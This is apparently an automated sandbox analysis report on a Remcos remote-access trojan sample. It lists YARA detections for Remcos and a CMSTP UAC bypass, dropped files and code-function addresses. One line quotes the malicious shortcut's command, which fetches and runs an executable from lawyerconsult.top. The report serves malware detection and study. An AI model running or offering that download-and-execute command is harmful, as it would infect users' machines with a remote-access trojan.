Source: 33.2.explorer.exe.4705a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.52b9b57.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.explorer.exe.4aadb57.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 32.2.explorer.exe.557aa8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.DZIPR.exe.35df9ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.4fb1757.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5274a8a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.cc9757.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.51df757.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.55b9757.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.c83a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.explorer.exe.474b757.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001A.00000002.1827195478.00000000005CB000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\hello.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: MdkbG2pK4l.lnk

LNK file: /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile %APPDATA%/hello.exe && %APPDATA%/hello.exe

Contains functionality to call native functions

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB0D95 NtdllDefWindowProc_W,	19_2_6FEB0D95
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB2932 _memset,NtdllDefWindowProc_W,	19_2_6FEB2932
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEAE5F6 NtdllDefWindowProc_W,CallWindowProcW,	19_2_6FEAE5F6

Creates files inside the system directory

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Tasks\lnfast_x64.job

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00404FAA	11_2_00404FAA
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_0041206B	11_2_0041206B
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_0041022D	11_2_0041022D
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00411F91	11_2_00411F91
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE25E70	12_2_6FE25E70
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE263F0	12_2_6FE263F0
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE35FB7	12_2_6FE35FB7
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE3AE45	12_2_6FE3AE45
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE43E3B	12_2_6FE43E3B
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE31D85	12_2_6FE31D85
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE25CA0	12_2_6FE25CA0
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE42CBB	12_2_6FE42CBB
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE36C6C	12_2_6FE36C6C
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE36860	12_2_6FE36860
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE4586C	12_2_6FE4586C
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE217D0	12_2_6FE217D0
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE43743	12_2_6FE43743
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE21730	12_2_6FE21730
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE21739	12_2_6FE21739
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE3648C	12_2_6FE3648C
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE431FF	12_2_6FE431FF
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE3708C	12_2_6FE3708C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C915E70	13_2_6C915E70
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9163F0	13_2_6C9163F0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C92648C	13_2_6C92648C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C932CBB	13_2_6C932CBB
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C915CA0	13_2_6C915CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C926C6C	13_2_6C926C6C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C921D85	13_2_6C921D85
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C933E3B	13_2_6C933E3B
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C92AE45	13_2_6C92AE45
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C925FB7	13_2_6C925FB7
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9117D0	13_2_6C9117D0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C911731	13_2_6C911731
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C911730	13_2_6C911730
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C933743	13_2_6C933743
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C92708C	13_2_6C92708C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C926860	13_2_6C926860
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C93586C	13_2_6C93586C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9331FF	13_2_6C9331FF
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA5E70	19_2_6FEA5E70
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA63F0	19_2_6FEA63F0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB5FB7	19_2_6FEB5FB7
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEBAE45	19_2_6FEBAE45
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC3E3B	19_2_6FEC3E3B
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB1D85	19_2_6FEB1D85
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA5CA0	19_2_6FEA5CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC2CBB	19_2_6FEC2CBB
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB6C6C	19_2_6FEB6C6C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC586C	19_2_6FEC586C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB6860	19_2_6FEB6860
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA17D0	19_2_6FEA17D0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC3743	19_2_6FEC3743
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA1730	19_2_6FEA1730
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA1731	19_2_6FEA1731
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB648C	19_2_6FEB648C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC31FF	19_2_6FEC31FF
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB708C	19_2_6FEB708C

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\lejp 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\paogviura 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6C9250C9 appears 65 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6FEB53BC appears 49 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6C9253BC appears 45 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6FEB50C9 appears 65 times
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: String function: 0040243B appears 37 times
Source: C:\Users\user\DZIPR.exe	Code function: String function: 6FE350C9 appears 66 times
Source: C:\Users\user\DZIPR.exe	Code function: String function: 6FE353BC appears 48 times

Yara signature match

Source: 20.2.cmd.exe.4fb0b57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 32.2.explorer.exe.55bfb57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.52ba757.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.5573a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.DZIPR.exe.35e05ce.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.explorer.exe.4a68a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.DZIPR.exe.359a901.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.55b8b57.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 32.2.explorer.exe.55c0757.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.explorer.exe.4aae757.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.cc8b57.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.explorer.exe.474ab57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.5199a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.51deb57.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.cmd.exe.4f6ba8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.explorer.exe.4705a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.52b9b57.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.explorer.exe.4aadb57.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 32.2.explorer.exe.557aa8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
